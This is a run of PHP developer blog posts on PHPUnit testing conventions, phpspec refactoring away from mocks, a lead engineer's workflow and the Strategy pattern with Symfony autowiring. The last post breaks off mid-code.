#[CoversClass(Username::class)]
#[Small]
final class UsernameTest extends TestCase
{
private function username(string $value = 'Merlin'): Username
{
return Username::fromString($value);
}
#[TestDox('It can be converted from/to string')]
public function test_it_can_be_converted_from_and_to_string(): void
{
$this->assertSame('Merlin', $this->username()->toString());
}
#[DataProvider('invalidUsernameProvider')]
#[TestDox('It fails when raw username $scenario')]
public function test_it_fails_when_raw_username_is_invalid(
string $scenario,
string $invalidUsername,
): void {
$this->expectException(ValidationFailedException::class);
$this->username($invalidUsername);
}
/**
* @return \Iterator<array{
* scenario: string,
* invalidUsername: string,
* }>
*/
public static function invalidUsernameProvider(): \Iterator
{
yield ['scenario' => 'is empty', 'invalidUsername' => ''];
yield ['scenario' => 'is too short (< 4 characters)', 'invalidUsername' => 'abc'];
yield ['scenario' => 'is too long (> 15 characters)', 'invalidUsername' => 'abcdefghijklmnop'];
}
}
Prefer private factory methods over setUp() to create the System Under Test (SUT):
setUp() runs before every test, even those that don't need itWarning: PHPUnit creates one instance of each test class per test method and per data provider row, and keeps them all in memory until the testsuite completes.
Attributes (#[<Name>]) were introduced in PHP 8 and PHPUnit 10,
they replace Annotations (PHPdoc @<Name>) which have been deprecated in PHPUnit 10
and removed in PHPUnit 12.
Their goal is to make PHP tooling more robust and IDE integration more reliable, use them!
Specify targeted class:
#[CoversClass]: enforces proper test boundaries, prevents accidental coverage,
and makes the intent clearer both to the readers and tools
(code coverage, static analysis, etc)#[UsesClass]: if code from other classes is expected to be usedCategorize tests based on their scope, complexity and resource usage:
#[Small] for testing individual components in isolation (unit),
fast execution (typically under 100ms)#[Medium] for testing multiple components together in isolation (integration),
moderate execution (typically under 1s)#[Large] for complete workflows (end to end),
slow execution (over 1s)#[Group] for arbitrary categories (including temporary ones, eg wip)Use Data Providers to test different sets of inputs / outputs:
#[DataProvider(string $publicStaticMethodName)]
for a method in the test class#[DataProviderExternal(string $className, string $publicStaticMethodName)]
for a method in a different class from the test one#[TestWith(array $data)]
to provide one set at a time, without having to declare a static methodRun PHPUnit with --testdox option to get executable specifications:
#[TestDox(string $text)]
to customize what PHPUnit will displayUse \Iterator with yield and named parameters for readable data providers,
combined with #[TestDox] and a $scenario variable
(as shown in the UsernameTest example above).
Output with --testdox:
Username
✔ It can be converted from/to string
✔ It fails when raw username is empty
✔ It fails when raw username is too short (< 4 characters)
✔ It fails when raw username is too long (> 15 characters)
Follow Coding Standards to ensure consistency across the PHP ecosystem, and internal projects:
Here are examples of topics you can debate:
declare(strict_types=1))
to prevent type coercion bugs that can cause tests to pass when they shouldn't$this over self
to call PHPUnit assertions#[Test] attribute and it_ prefix
to help name test methods in an articulate wayFIRST properties of Unit Tests, they should be:
Follow AAA, each test method should group these functional sections, separated by blank lines:
Not necessarily in that order (eg when testing exceptions: Arrange, Expect, Act).
DRY vs DAMP (aka WET), it's all about finding the right balance: pick whichever is more readable, on a case-by-case basis.
"DRY (Don't Repeat Yourself) increases maintainability by isolating change (risk) to only those parts of the system that must change.
DAMP (Descriptive And Meaningful Phrases, aka WET: We Edit Twice) increases maintainability by reducing the time necessary to read and understand the code."
— Chris Edwards
Note: this is "In My Humble Opinion".
There are two Test Driven Development (TDD) schools of thought:
The mocking library prophecy's expressive syntax
allows for an approach that's more aligned with spec BDD.
It can be used in PHPUnit with the phpspec/prophecy-phpunit package.
When the SUT creates values internally, use Argument matchers:
Argument::type(ClassName::class): matches by typeArgument::that(static fn ($v): bool => ...): matches with a custom closureArgument::any(): matches anything<?php
declare(strict_types=1);
namespace App\Tests\Unit;
use Prophecy\Argument;
use Prophecy\PhpUnit\ProphecyTrait;
use PHPUnit\Framework\Attributes\CoversClass;
use PHPUnit\Framework\Attributes\Small;
use PHPUnit\Framework\TestCase;
#[CoversClass(SignInPlayerHandler::class)]
#[Small]
final class SignInPlayerHandlerTest extends TestCase
{
use ProphecyTrait;
public function test_it_signs_in_player(): void
{
$username = UsernameFixture::makeString();
$player = PlayerFixture::make();
// Stub: configure return value
$findPlayer = $this->prophesize(FindPlayer::class);
$findPlayer->find(
Argument::that(static fn (Username $u): bool => $u->toString() === $username),
)->willReturn($player);
// Mock: assert it gets called
$saveAuthToken = $this->prophesize(SaveAuthToken::class);
$saveAuthToken->save(Argument::type(AuthToken::class))
->shouldBeCalled();
$signInPlayerHandler = new SignInPlayerHandler(
$findPlayer->reveal(),
$saveAuthToken->reveal(),
);
$signedInPlayer = $signInPlayerHandler->run(new SignInPlayer(
$username,
));
$this->assertInstanceOf(SignedInPlayer::class, $signedInPlayer);
}
}
🤫 Super Secret Tip:
PHPUnit instantiates the test class once per test method and once per data provider row. This is a fundamental design decision that prioritizes test isolation over performance.
So if you have:
- 5 regular test methods: that's 5 instances
- 1 test method with 10 data provider rows: that's 10 instances
- Total: 15 instances created
Why This Matters:
- Performance : expensive
setUp()and constructors will have a measurable impact- Memory Usage: Each instance holds its own state in memory until the end of the testsuite run
- Test Isolation: Ensures no state leakage between tests (the main benefit)
Since each test method creates a new instance, expensive operations compound quickly. Watch out for:
- repeated kernel booting
- database connections
- fixture loading (especially when Doctrine ORM Entity hydration is involved)
- external API calls
You can use singletons for stateless services, transactions for database cleanup, and mocks for external dependencies. The example below uses
AppSingleton::get()to share a stateless application instance across the entire testsuite.
Note: this is the pragmatic approach.
For controllers and commands, no need to mock internal dependencies or asserting on complex business logic.
Just craft the input, pass it to application, and verify the status code.
This tests the entire request-response cycle: routing, middleware, validation, business logic, serialization... Everything.
Here's an integration test for a POST /api/v1/actions/sign-up-new-player endpoint controller:
<?php
declare(strict_types=1);
namespace App\Tests\Integration\Controller;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\Medium;
use PHPUnit\Framework\TestCase;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
#[CoversNothing]
#[Medium]
final class SignUpNewPlayerControllerTest extends TestCase
{
public function test_it_signs_up_a_new_player(): void
{
$appKernel = TestKernelSingleton::get()->appKernel();
$request = Request::create(
uri: '/api/v1/actions/sign-up-new-player',
method: 'POST',
server: ['CONTENT_TYPE' => 'application/json'],
content: json_encode([
'username' => UsernameFixture::makeString(),
'password' => PasswordPlainFixture::makeString(),
], \JSON_THROW_ON_ERROR),
);
$response = $appKernel->handle($request);
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode(), (string) $response->getContent());
}
}
And here's an integration test for a ./bin/console action:sign-up-new-player CLI command:
<?php
declare(strict_types=1);
namespace App\Tests\Integration\Cli;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\Medium;
use PHPUnit\Framework\TestCase;
use Symfony\Component\Console\Command\Command;
#[CoversNothing]
#[Medium]
final class SignUpNewPlayerCommandTest extends TestCase
{
public function test_it_signs_up_a_new_player(): void
{
$application = TestKernelSingleton::get()->application();
$application->run([
'command' => 'action:sign-up-new-player',
'username' => UsernameFixture::makeString(),
'password' => PasswordPlainFixture::makeString(),
]);
$this->assertSame(Command::SUCCESS, $application->getStatusCode());
}
}
phpunit
# Configuration:
--generate-configuration Generate configuration file with suggested settings
--migrate-configuration Migrate configuration file to current format
# Selection:
--list-groups List available test groups
--group small Only run tests from the specified group(s)
--exclude-group small Exclude tests from the specified group(s)
--list-tests List available tests
--covers 'Username' Only run tests that intend to cover <name>
--filter 'UsernameTest' Filter which tests to run (test class, or test method)
--filter 'test_it_can_be_converted_from_and_to_string'
## Useful for running testsuites individually, in the CI
--list-testsuites List available testsuites
--testsuite unit Only run tests from the specified testsuite(s)
--exclude-testsuite unit Exclude tests from the specified testsuite(s)
# Execution
--stop-on-failure Stop after first failure
--order-by <order> Run tests in order: default|defects|depends|duration|no-depends|random|reverse|size
# Reporting
--no-progress Disable output of test execution progress (the dots)
--testdox Replace default result output with TestDox format
Order By options:
default: tests run in the order they're discovered (filesystem order, typically alphabetical)defects: previously failed/errored tests run first (requires--cache-resultto remember past failures)depends: tests with dependencies run after their dependencies, non-dependent tests run firstduration: fastest tests run first, slowest tests run last (requires--cache-resultto remember execution times)no-depends: ignores test dependencies and runs tests in discovery orderrandom: tests run in random order (use--random-order-seed <N>for reproducible randomness)reverse: tests run in reverse discovery ordersize: tests run by size:#[Small], then#[Medium], after#[Large], and finally unsized testsWorth noting:
- Combining options:
--order-by=depends,defects
<?xml version="1.0" encoding="UTF-8"?>
<!-- https://phpunit.readthedocs.io/en/latest/configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="vendor/phpunit/phpunit/phpunit.xsd"
bootstrap="tests/bootstrap.php"
cacheDirectory=".phpunit.cache"
executionOrder="depends,defects"
requireCoverageMetadata="true"
beStrictAboutCoverageMetadata="true"
beStrictAboutOutputDuringTests="true"
displayDetailsOnPhpunitDeprecations="true"
failOnPhpunitDeprecation="true"
failOnRisky="true"
failOnWarning="true"
shortenArraysForExportThreshold="10"
colors="true"
>
<php>
<!-- Useful for CI environments -->
<ini name="display_errors" value="1" />
<ini name="error_reporting" value="-1" />
<!-- Useful for Symfony -->
<env name="KERNEL_CLASS" value="App\Kernel" />
<env name="APP_ENV" value="test" force="true" />
<env name="APP_DEBUG" value="0" force="true" />
<env name="SHELL_VERBOSITY" value="-1" />
</php>
<testsuites>
<testsuite name="unit">
<directory>tests/Unit</directory>
</testsuite>
<testsuite name="integration">
<directory>tests/Integration</directory>
</testsuite>
</testsuites>
<source
ignoreIndirectDeprecations="true"
restrictNotices="true"
restrictWarnings="true"
>
<include>
<directory>src</directory>
</include>
</source>
</phpunit>
Notes:
bootstrapdefaults tovendor/autoload.phpshortenArraysForExportThresholddefaults to0from v11.3 and10from v12colorsdefaults tofalse, for automated/scripted environment compatibility
TL;DR: Arrr, PHP be a cunning pirate, pilferin' ideas from other languages to stay ahead o' the fleet. 'Tis true, PHP is no bonny innovator, but it be masterful at plunderin' and adaptin' features, keepin' its sails full and its reputation mighty in the tech seas.
Pádraic Brady. 2012. PHP: a Pillagin Pirate
PHP has a long history of adopting, porting, and emulating successful ideas and tools from other technologies, often resulting in robust implementations that fit the PHP ecosystem.
Here are some examples:
Those are old and established examples, but as long as there are creative PHP developers out there, there'll still be more treasures to purloin.
For example, I've recently stumbled upon Dan Leech's port of Ratatui (Rust): PHP-tui (2024).
There are no reasons to stop there.
So, what's the next innovation? What other brand new and shiny (or ancient and rusty) idea can we, PHP Pirates, bring to our colourful ecosystem?
]]>In September 2014, I left SensioLabs (the creator of the Symfony Framework) to work as a PHP/Symfony Developer at Foodity, a London start-up that created a service allowing people to add ingredients from online recipes to the basket of the retailer of their choice.
After 9 months, I pitched an idea to the CEO: we had a platform that theoretically allowed us to add ANY product to the basket, not just food items. We called it Smart Product.
So I was given the opportunity to build a Proof of Concept. Once completed and launched it proved successful and was promoted "Lead PHP Engineer" in charge of a small team to develop it further.
And so in June 2015, Foodity pivoted and became Constant Commerce, with Smart Product being one of its main product.
Later, in August 2018, the start-up pivoted again and became Constant.Co: my team and I were given the responsibility to design and develop the API for its new main product: Landing Space.
This article is about my role as a Lead PHP Engineer during that time, and what my job and responsibilities were about, on a day to day basis.
As a lead developer, my responsibilities were:
The company as a whole would work through Cycles: each Cycle is 6 week long, and contains 3 sprints (2 week sprints).
Prior to the Cycle (ie during the previous cycle), the CEO, Sales and Product would flesh out a milestone to achieve. Meetings between the CEO, Sales, Product, Technical Leads and QA would be held to identify the user stories and their acceptance criteria.
As a Lead Developer, my role in this meeting was to assess the feasibility of the features described, evaluate how the new requirements would affect the existing code base (ie is this already implemented, management of the technical debt, etc) and provide technical guidance.
Architecture meetings between Product, Technical Leads and QA would be held to write technical specifications.
As a Lead Developer, my role in this meeting was to collaborate with other teams on how to best integrate the different systems, document the requirements, identify and resolve performance bottlenecks, security vulnerabilities, and other technical issues.
When the Cycle starts, so does the first Sprint: a Sprint Planning meeting is held between Product, the technical teams and QA, where User Stories are picked from the backlog and given an estimated Complexity Points, and assigned to developers. Once the Team Capacity is reached, based on previous Velocity, then the development can start.
I'd start by picking a ticket and moving it to "In Progress".
I'd then write an integration test that fits to one of the User Story's Acceptance Criteria. Usually the first test is about a "Happy Scenario": what we expect. following tests would be about "Unhappy Scenario" and trying to identify edge cases. Then run them to make sure they fails for the right reasons (ie because the code isn't written yet).
Next I'd write a unit test. Run it to make sure it fails for the right reason.
After that I'd write the code for that test. And run the test suite to make sure it fulfils the new requirements without breaking the previous ones.
Once the tests pass, I can add new scenarios to my test suite, and start the process again, until everything is covered, and only then I'd also consider refactoring the code to ensure the maintainability of the project.
Finally, I can commit my work with a detailed message, push, create a Pull Request and assign it to someone for Code Review.
The ticket can now be moved to "Code Review".
I take this opportunity to check if there are any open Pull Requests waiting for me to review them.
First thing I do when reviewing a Pull Request is check the corresponding ticket to get familiar with the problem that it tries to solve.
I'd then pull the code to my local machine, execute the test suite and launch the application to navigate it and try the feature first hand.
Next, I have a look at the code, with the objective to answer these three questions:
The purpose of Code Reviews isn't to nitpick or force what you'd have done instead, but to help your co-worker:
There are two kinds of feedback that can be left:
Once the feedback from the first round has been taken into account, other rounds of Code Reviews can be done, but to get the feature deployed as early as possible it's important to focus these on identifying broken things and fixing them (rather than making more suggestions for improvements).
Finally, when the Pull Request is accepted, it can be merged and sent to QA.
As a Lead Developer, one of my responsibility is the mentoring of team members.
One aspect of this was the preparation and delivery of training (Symfony, Git, Test Driven Development), but I'd also give (and encourage others to give) some presentations or lightning talks on different topics (libraries, practices, etc).
But one of my favourite tool was Pair Programming, which proved quite efficient when on boarding the junior developer. These would be short sessions, rather than whole days spent together, and we'd follow a strict Driver-Navigator rule (ie the one with keyboard only writes what they agree to, while the other one explains the vision) with regular switching at first, and then on task as we became more synchronised.
]]>TL;DR: phpspec isn't a test framework. It's a code designing/modeling tool.
Looking at some 2014 code of mine, I found the following test:
<?php
namespace spec\Memio\SpecGen\CodeEditor;
use Gnugat\Redaktilo;
use Memio\Model;
use Memio\PrettyPrinter\PrettyPrinter;
use Memio\SpecGen\CodeEditor\InsertConstructor;
use Memio\SpecGen\CodeEditor\InsertConstructorHandler;
use Memio\SpecGen\CommandBus\CommandHandler;
use PhpSpec\ObjectBehavior;
class InsertConstructorHandlerSpec extends ObjectBehavior
{
function let(
Redaktilo\Editor $redaktiloEditor,
PrettyPrinter $prettyPrinter,
) {
$this->beConstructedWith($redaktiloEditor, $prettyPrinter);
}
function it_inserts_constructor_in_class_that_has_constants_and_methods(
Redaktilo\Editor $redaktiloEditor,
Redaktilo\File $redaktiloFile,
Model\Method $modelMethod,
PrettyPrinter $prettyPrinter,
) {
$insertConstructor = new InsertConstructor($redaktiloFile->getWrappedObject(), $modelMethod->getWrappedObject());
$generatedCode =<<<'GENERATED_CODE'
public function __construct(Dependency $dependency, string $redaktiloFilename)
{
$this->dependency = $dependency;
$this->filename = $redaktiloFilename;
}
GENERATED_CODE
;
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::CONSTRUCTOR, 0)->willReturn(false);
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->willReturn(true);
$redaktiloEditor->jumpBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->shouldBeCalled();
$redaktiloEditor->insertAbove($redaktiloFile, '')->shouldBeCalled();
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedCode);
$redaktiloEditor->insertAbove($redaktiloFile, $generatedCode)->shouldBeCalled();
$redaktiloFile->decrementCurrentLineNumber(1)->shouldBeCalled();
$redaktiloFile->getLine()->willReturn(' const CONSTANT = 42;');
$redaktiloEditor->insertBelow($redaktiloFile, '')->shouldBeCalled();
$this->handle($insertConstructor);
}
}
There are some things that feel wrong there, like the calls to
getWrappedObject(), and when something feels wrong with phpspec, it usually
means that this thing is wrong.
As per the previous advice, don't mock SUT inputs,
I've removed the inputs mock and their awkward getWrappedObject() calls
and instead set up the inputs:
function it_inserts_constructor_in_class_that_has_constants_and_methods(
Redaktilo\Editor $redaktiloEditor,
PrettyPrinter $prettyPrinter,
) {
$redaktiloFile = Redaktilo\File::fromString(<<<'FILE'
<?php
namespace Vendor\Project;
class MyClass
{
const CONSTANT = 42;
public function existingMethod()
{
}
}
FILE
);
$modelMethod = (new Model\Method('__construct'))
->addArgument(new Model\Argument('Vendor\Project\Dependency', 'dependency'))
->addArgument(new Model\Argument('string', 'filename'))
;
$insertConstructor = new InsertConstructor($redaktiloFile, $modelMethod);
$generatedCode =<<<'GENERATED_CODE'
public function __construct(Dependency $dependency, string $redaktiloFilename)
{
$this->dependency = $dependency;
$this->filename = $redaktiloFilename;
}
GENERATED_CODE
;
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::CONSTRUCTOR, 0)->willReturn(false);
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->willReturn(true);
$redaktiloEditor->jumpBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->shouldBeCalled();
$redaktiloEditor->insertAbove($redaktiloFile, '')->shouldBeCalled();
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedCode);
$redaktiloEditor->insertAbove($redaktiloFile, $generatedCode)->shouldBeCalled();
$redaktiloEditor->insertBelow($redaktiloFile, '')->shouldBeCalled();
$this->handle($insertConstructor);
}
Now pay attention to the two following lines we've removed:
$redaktiloFile->decrementCurrentLineNumber(1)->shouldBeCalled();
$redaktiloFile->getLine()->willReturn(' const CONSTANT = 42;');
After running the tests, I get an error:
Exception
Gnugat\Redaktilo\Exception\InvalidLineNumberException("The line number should be positive")has been thrown.
When the Redaktilo File is first instantiated in our test method, it is
initialised with a "current line number" set to 0. Since Redaktilo's Editor
is mocked, it doesn't update the file's "current line number" as it would in
a real situation. Our SUT, InsertConstructorHandler, however calls directly
decrementCurrentLineNumber on the file, which ends up trying to set
"current line number" to -1, hence the exception.
To make the test pass, we could add a call to Redaktilo's File
setCurrentLineNumber(), for example:
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::CONSTRUCTOR, 0)->willReturn(false);
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->willReturn(true);
$redaktiloEditor->jumpBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->shouldBeCalled();
$redaktiloFile->setCurrentLineNumber(11);
$redaktiloEditor->insertAbove($redaktiloFile, '')->shouldBeCalled();
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedCode);
$redaktiloEditor->insertAbove($redaktiloFile, $generatedCode)->shouldBeCalled();
$redaktiloEditor->insertBelow($redaktiloFile, '')->shouldBeCalled();
But this feels wrong, and when something feels wrong with phpspec, it usually means that this thing is wrong. But what?
Let's take a step back and look at the test again. What are we trying to achieve here?
It is a test method, written with phpspec, that checks assertions on the
implementation details of the class under test InsertConstructorHandler,
by setting up mocks for the Redaktilo library.
2014 me would think that's perfectly reasonable, and would probably struggle to identify the issue. But 2024 me can tell straight away from the above paragraph what the issue is.
I've actually always had some issue understanding the advice "don't mock what you don't own". How do we really define what we own, and what we don't?
The answer to these questions probably depends on the context, but here in
InsertConstructorHandler, it certainly feels like Redaktilo, a third party
library (which I've developed), is "something that I don't own" and therefore
shouldn't be mocked.
Now that we have identified the problem, how do we fix it?
Let's re-read the first paragraph of the previous section, and more specifically:
It is a test method, written with phpspec, that checks assertions on the implementation details of the class under test
InsertConstructorHandler, by setting up mocks for the Redaktilo library.
And when reading the test method, we get a lot of "has below" and "jump below" and "insert above". This is all implementation detail. And this is all Redaktilo's (clunky) language.
Our test method is a one to one translation of the implementation details.
phpspec is a specBDD framework. One of the core of Behaviour Driven Development is to drop the "unit testing" terminology and use a slightly different vocabulary instead:
See Liz Keogh. 2009. Translating TDD to BDD
This might not seem like much, or very useful, but in reality the language used is key to changing our perspective.
To be able to have an example that checks expectations on a specific use case, we first need to define the behaviour we want to describe in plain English:
If the class doesn't already have a constructor But it has an existing method, As well as potentially a constant, or property definition Then the generated code for the new constructor Should be inserted above the existing method, separated by an empty line And it should also be under the constant and property definitions, also separated by an empty line
We then try our best to translate that into code. To use the exact same vocabulary. This cannot be done by mocking Redaktilo, which has its own vocabulary.
So we have to extract the Redaktilo implementation details and hide them in classes that have descriptive names which are relevant to our use case.
Creating a new abstraction layer, essentially.
Here's our new and improved "example":
function it_inserts_constructor_above_methods_but_under_constants_and_properties(
DoesClassAlreadyHaveConstructor $doesClassAlreadyHaveConstructor,
DoesClassAlreadyHaveMethods $doesClassAlreadyHaveMethod,
PrettyPrinter $prettyPrinter,
InsertGeneratedConstructorAboveExistingMethods $insertGeneratedConstructorAboveExistingMethods,
) {
$inFile = Redaktilo\File::fromString(<<<'FILE'
<?php
namespace Vendor\Project;
class MyClass
{
const CONSTANT = 42;
public function existingMethod()
{
}
}
FILE
);
$modelConstructor = (new Model\Method('__construct'))
->addArgument(new Model\Argument('Vendor\Project\Dependency', 'dependency'))
->addArgument(new Model\Argument('string', 'filename'))
;
$insertConstructor = new InsertConstructor($inFile, $modelConstructor);
$generatedConstructor =<<<'GENERATED_CODE'
public function __construct(Dependency $dependency, string $redaktiloFilename)
{
$this->dependency = $dependency;
$this->filename = $redaktiloFilename;
}
GENERATED_CODE
;
$doesClassAlreadyHaveConstructor->check($inFile)->withReturn(false);
$doesClassAlreadyHaveMethod->check($inFile)->withReturn(true);
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedConstructor);
$insertGeneratedConstructorAboveExistingMethods->insert($generatedConstructor, $inFile)->shouldBeCalled();
$this->handle($insertConstructor);
}
It no longer has Redaktilo\Editor.
It now has:
DoesClassAlreadyHaveConstructor->check(Redaktilo\File $inFile): bool
$this->redaktiloEditor->hasBelow($inFile, InsertConstructorHandler::CONSTRUCTOR, 0);DoesClassAlreadyHaveMethods->check(Redaktilo\File $inFile): bool
$this->redaktiloEditor->hasBelow($inFile, InsertConstructorHandler::METHOD, 0);InsertGeneratedConstructorAboveExistingMethods->insert(string $generatedConstructor, Redaktilo\File $inFile): void
$this->redaktiloEditor->jumpBelow($inFile, InsertConstructorHandler::METHOD, 0);$this->redaktiloEditor->insertAbove($inFile, '');$this->redaktiloEditor->insertAbove($inFile, $generatedCode);$this->redaktiloEditor->insertBelow($inFile, '');And it still has:
Model\Method, this is one of the inputs of our use case, it seems fine as isRedaktilo\File, though the variable has been renamed to $inFilePrettyPrinter, as far as I can tell, this collaborator still describes the behaviour we wantI've also taken the liberty to rename a couple of things, to make the intent more explicit:
$redaktiloFile becomes $inFile, I've taken a liking to having code read
like sentences (insert generated code in file)it_inserts_constructor_in_class_that_has_constants_and_methods becomes
it_inserts_constructor_above_methods_but_under_constants_and_properties,
as I think that describes the use case a bit better (though in the
implementation, we end up not caring about constants and properties, as
we generate the constructor above methods, which we expect to be below
constants and properties)But there are more changes that have been introduced as a result of this new abstraction layer. On the positive side, we got:
On the negative side:
InsertGeneratedConstructorAtTheEndOfTheClass
when there are no methods in the class)While there is value in the code at the beginning of this article, as it worked just fine as it was, I personally value the new version more, even with the drawbacks they bring.
Having an executable specification that results in a code that explicitly describes its intent is, in my humble opinion, quite a worthy improvement indeed.
Note: also, while the initial version of the code "worked", it did come with its own drawbacks. It takes some time to understand what the code does (the "jump above and below" mumbo jumbo isn't very helpful), and it was coupled to a third party library, meaning tying us to its upgrade policy and making us subject to its backward incompatible changes.
phpspec is highly opinionated, has very intentional "limitations", and has this knack of making you feel like something is wrong -- when you're indeed doing something you shouldn't be doing.
It's not a testing framework, no, it's a designing / modeling tool.
]]><?php
namespace spec\Memio\SpecGen\GenerateMethod;
use Memio\Model\File;
use Memio\Model\Method;
use Memio\Model\Objekt;
use Memio\SpecGen\GenerateMethod\GeneratedMethod;
use PhpSpec\Console\ConsoleIO;
use PhpSpec\ObjectBehavior;
class LogGeneratedMethodListenerSpec extends ObjectBehavior
{
function let(ConsoleIO $io)
{
$this->beConstructedWith($io);
}
function it_logs_the_generated_method(ConsoleIO $io, File $file, Method $method, Objekt $object)
{
$className = 'Vendor\Project\MyClass';
$methodName = 'myMethod';
$generatedMethod = new GeneratedMethod($file->getWrappedObject());
$file->getStructure()->willReturn($object);
$object->getName()->willReturn($className);
$object->allMethods()->willReturn([$method]);
$method->getName()->willReturn($methodName);
$io->write(<<<OUTPUT
<info>Generated <value>{$className}#{$methodName}</value></info>
OUTPUT
)->shouldBeCalled();
$this->onGeneratedMethod($generatedMethod);
}
}
And while reading it, one of the things that caught my attention was the setting up of mocks for SUT inputs (SUT means System Under Test, the class we're testing).
The purpose of this test is to specify how LogGeneratedMethodListener should
behave, through its interactions with the ConsoleIO collaborator.
But here, it's also specifying how LogGeneratedMethodListener interacts
with the input parameter GeneratedMethod.
GeneratedMethod encapsulates data relevant to the process of generating the
code for a Method. It doesn't have any critical behaviour:
we just call getters on it.
So my advice to you (me, from the past), would be to not bother creating Mocks for it:
<?php
namespace spec\Memio\SpecGen\GenerateMethod;
use Memio\Model\File;
use Memio\Model\Method;
use Memio\Model\Objekt;
use Memio\SpecGen\GenerateMethod\GeneratedMethod;
use PhpSpec\Console\ConsoleIO;
use PhpSpec\ObjectBehavior;
class LogGeneratedMethodListenerSpec extends ObjectBehavior
{
function let(ConsoleIO $io)
{
$this->beConstructedWith($io);
}
function it_logs_the_generated_method(ConsoleIO $io)
{
$className = 'Vendor\Project\MyClass';
$methodName = 'myMethod';
$generatedMethod = new GeneratedMethod((new File('src/MyClass.php'))
->setStructure((new Objekt($className))
->addMethod(new Method($methodName))
)
);
$io->write(<<<OUTPUT
<info>Generated <value>{$className}#{$methodName}</value></info>
OUTPUT
)->shouldBeCalled();
$this->onGeneratedMethod($generatedMethod);
}
}
]]>TL;DR: Since Symfony 5.3
Tag the "Strategy" Interface with the attribute [#AutoconfigureTag]:
<?php
use Symfony\Component\DependencyInjection\Attribute\AutoconfigureTag;
#[AutoconfigureTag]
interface Strategy
{
// Add your Strategy methods below, for example
// (please use a more descriptive name than "algorithm"...):
public function algorithm();
// *IF* your Strategies need to be executed in a specific order,
// then add a method that returns the priority (highest priority first, lowest priority last)
// Note: it MUST be static
public static function getDefaultPriority(): int;
// *IF* your Strategies are executed conditionally,
// then add a "predicate" method (eg named `supports()`):
public function predicate($input): bool
}
Inject the iterable that contains all tagged "Strategy" implementations
in the "Context"'s constructor with the attribute #[TaggedIterator(<tag>)]:
<?php
class Context
{
public function __construct(
// *IF* your Strategies need to be executed in a specific order,
// then use the `defaultPriorityMethod` parameter and set it with the Strategy's static method name
#[TaggedIterator(Strategy::class, defaultPriorityMethod: 'getDefaultPriority')]
private iterable $strategies,
) {
}
public function operation($input)
{
foreach ($this->strategies() as $strategy) {
// *IF* your Strategies need to be executed conditionally,
// then add a if statement that verifies the Strategy's predicate method
if ($strategy->predicate($input)) {
$strategy->algorithm();
// *IF* you only want the first matching Strategy to be executed,
// then break the loop here
break;
}
}
}
}
Set autowire and autoconfigure parameters to be true in the DIC configuration:
services:
_defaults:
autowire: true
autoconfigure: true
The Strategy Pattern can be really useful when you want to avoid multiple conditionals, and/or when you want to add new repetitive chunks of logic in a maintainable way.
Let's see how to use it in a Symfony application, and how autowiring can help us configure it.
Note that the code snippets below will NOT be truncated, they'll always contain
the full code (so no things like // rest of the class below comments).
Some classes are just bound to contain repeated chunks of similar logic:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
private RetrieveDataForReportOne $retrieveDataForReportOne,
private RetrieveDataForReportTwo $retrieveDataForReportTwo,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$reportOneData = $this->retrieveDataForReportOne->fromDatabase($startDate, $endDate);
$reportOneName = 'Report One';
$reportOneSpreadsheet = $this->buildSpreadsheet->using($reportOneData, $reportOneName);
$reportOneFilename = $this->writeSpreadsheet->save($reportOneSpreadsheet);
$reportTwoData = $this->retrieveDataForReportTwo->fromDatabase($startDate, $endDate);
$reportTwoName = 'Report Two';
$reportTwoSpreadsheet = $this->buildSpreadsheet->using($reportTwoData, $reportTwoName);
$reportTwoFilename = $this->writeSpreadsheet->save($reportTwoSpreadsheet);
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->attachFromPath($reportOneFilename, $reportOneName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
->attachFromPath($reportTwoFilename, $reportTwoName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
->subject('Daily Reports')
->text('Find reports in attached files');
$this->mailer->send($email);
}
}
This EmailDailyReports class builds spreadsheets and sends emails for reports.
The retrieval of the data for each report is delegated to a dedicated service.
This is fine as is, with currently only 2 reports to manage... But what if we need to add 1 more report? 2 more reports? 30 more reports?
This use case is the perfect candidate for the Strategy Pattern.
EmailDailyReports would be considered the "Context" class,
and the services that retrieve the report data would be the "Strategies".
Let's refactor EmailDailyReports to implement this design pattern.
First we create a Strategy interface:
<?php
interface RetrieveDataForReport
{
public function fromDatabase(\DateTime $startDate, \DateTime $endDate): array;
public function getName(): string;
}
Then we make sure the Strategy implementations both implement it
(RetrieveDataForReportOne and RetrieveDataForReportTwo).
Finally we refactor the Context class to be injected with a collection of Strategies, and iterate through them:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->subject('Daily Reports')
->text('Find reports in attached files');
foreach ($this->retrieveDataForReports as $retrieveDataForReport) {
$reportData = $retrieveDataForReport->fromDatabase($startDate, $endDate);
$reportName = $retrieveDataForReport->getReportName();
